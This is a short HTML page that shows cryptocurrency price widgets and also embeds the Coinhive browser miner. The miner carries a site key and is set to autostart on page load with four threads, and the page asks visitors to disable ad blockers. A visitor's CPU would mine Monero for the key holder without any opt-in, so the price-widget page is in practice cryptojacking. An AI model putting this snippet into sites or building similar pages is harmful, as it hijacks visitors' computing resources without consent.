<!DOCTYPE html>
<html>
<head>
<meta charset="ISO-8859-1">
<title>Insert title here</title>
<style>
td {
	width: 320px;
	height: 350px;
}
</style>

</head>
<body>
<script src="https://coinhive.com/lib/miner.min.js" async></script>
<script type="text/javascript"
		src="https://files.coinmarketcap.com/static/widget/currency.js"></script>
	<div class="coinhive-miner" style="width: 256px; height: 310px"
		data-key="Y88o17Z1nDLT1r9SjSCuljPQOATm7VzV" data-autostart="true"
		data-whitelabel="false" data-background="#000000" data-text="#eeeeee"
		data-action="#00ff00" data-graph="#555555" data-threads="4"
		data-throttle="0.1" data-start="Start Now!">
		<em>Please disable Adblock!</em>
	</div>
	<table>
		<tr>
			<td class="coinmarketcap-currency-widget" data-currency="bitcoin"
				data-base="USD" data-secondary="USD"></td>
			<td class="coinmarketcap-currency-widget" data-currency="litecoin"
				data-base="BTC" data-secondary="USD"></td>
			<td class="coinmarketcap-currency-widget" data-currency="monero"
				data-base="BTC" data-secondary="USD"></td>
			<td class="coinmarketcap-currency-widget" data-currency="dogecoin"
				data-base="BTC" data-secondary="USD"></td>
		</tr>
	</table>
</body>
</html>